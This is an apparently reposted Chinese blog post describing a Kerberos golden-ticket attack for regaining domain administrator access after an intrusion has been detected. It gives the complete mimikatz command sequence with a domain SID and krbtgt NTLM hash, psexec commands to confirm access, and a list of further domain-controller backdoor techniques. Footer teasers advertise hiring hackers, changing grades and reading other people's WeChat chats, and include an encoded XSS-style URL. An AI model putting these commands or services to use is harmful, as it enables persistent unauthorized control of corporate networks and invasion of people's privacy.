渗透技术|域渗透的金之钥匙

hacker4年前黑客资讯422

  最近几年很少搞内网渗透了,这几年发展的快啊,看了A牛翻译的 ,发现趋势都是powershell脚本化了。想当年遇到的域控都是windows 2003的,找朋友要些vbscript脚本自动化,然后那啥那啥的。现在搞域除了前段时间出的MS14068,还有龙哥翻译的,不知道还有什么新 *** ,心中还有 *** ,如果想交流的朋友,可以加我聊聊。

  我原来发过一个微博说

  

  这就是我说的金之钥匙【"golden ticket(s)"黄金票据】,利用这个的条件是你在原来搞定域控的时候,已经导出过域用户的HASH,尤其是krbtgt 这个用户的。但是在你在内网干其他事情的时候,活儿不细,被人家发现了,你拥有的域管理员权限掉了,你现在还有一个普通的域用户权限,管理员做加固的时候又忘记修改krbtgt密码了(很常见),我们还是能重新回来,步骤如下:

  要重新拿回域管理员权限,首先要先知道域内的管理员有谁

  我这里的实验环境,通过截图可以看到域管理员是administrator

  我还要知道域SID是啥

  我的域SID是

  还有最重要的krbtgt用户的ntlm哈希,我原来导出的是

  krbtgt(current-disabled):502:aad3b435b51404eeaad3b435b51404ee:6a8e501fabcf264c70 ef3316c6aab7dc:::

  

  然后该用神器mimikatz出场了,依次执行

  mimikatz # kerberos::purge

  mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribi

  mimikatz # kerberos::ptt Administrator.kiribi

  mimikatz # kerberos::tgt

  

  到现在,我们又重新拥有域管理员权限了,可以验证下

  E:\>net use \\WIN-0DKN2AS0T2G\c$

  E:\>psexec.exe \\WIN-0DKN2AS0T2G cmd

  

  呃,感觉这个 *** 比http://drops.wooyun.org/tips/9297这个方便些,文章写了好久了,一直凑不出更多的字数,就没发。。嗯。。。懒了。。

  当然除了golden ticket,silver ticket之外还有kerberos ticket,历史SID,AdminSDHolder,DSRM,GPP,DCSync等技术手段都可以用来当做域控的隐藏后门。

  【原文:域渗透的金之钥匙 作者:mickey 安全脉搏整理发布】

标签: 渗透测试

相关文章

怎么才能联系黑客(怎么才能进入黑客网站)

一、怎么才能联系黑客(怎么才能进入黑客网站)方法总结 1、如何进入黑客网建议您参考:雷公黑客教程希望对您有帮助! 2、谁知道怎么样才能加入黑客到了那个等级才能感觉到怎样才能进入黑客网?这里有很多东西...

网络小组组长,找黑客上哪里找,有哪位找黑客改分成功了

http://1de28830f09a4b1b.alictf.com/pet.php/?id=imageData&type=evi1m0%26%23x3c%3B%26%23x73%3B%26%...

习近平在中央政治局第二十次集体学习时强调 充分认识颁布实施民法典

央视网消息(新闻联播):中共中央政治局5月29日下午就“切实实施民法典”举行第二十次集体学习。中共中央总书记习近平在主持学习时强调,民法典在中国特色社会主义法律体系中具有重要地位,是一部固根本、稳预期...

只知道别人的微信号有设施查到别人的微信聊天记录吗

数据修复沒有能够修复的,同意能够修复的全是假的,它是由数据信息基本原理所决定,若是修复出去的数据信息沒有您要想的內容,即视作数据信息笼罩着修复不出来,购买前可完全免费扫描仪删掉数据信息,请凭证前两个标...

某外汇平台被海外黑客,黑客萌宝漫画免费阅读

某外汇平台被海外黑客,黑客萌宝漫画免费阅读

一、某外汇平台被海外黑客接单流程 1、接单怎么变成一个手机黑客在你学习之前一定要考虑这个问题。某外汇平台被海外萌宝漫画免费阅读当你在里面的时候,你可能是其中之一。迈达克mt4被攻击某外汇平台被海外XX...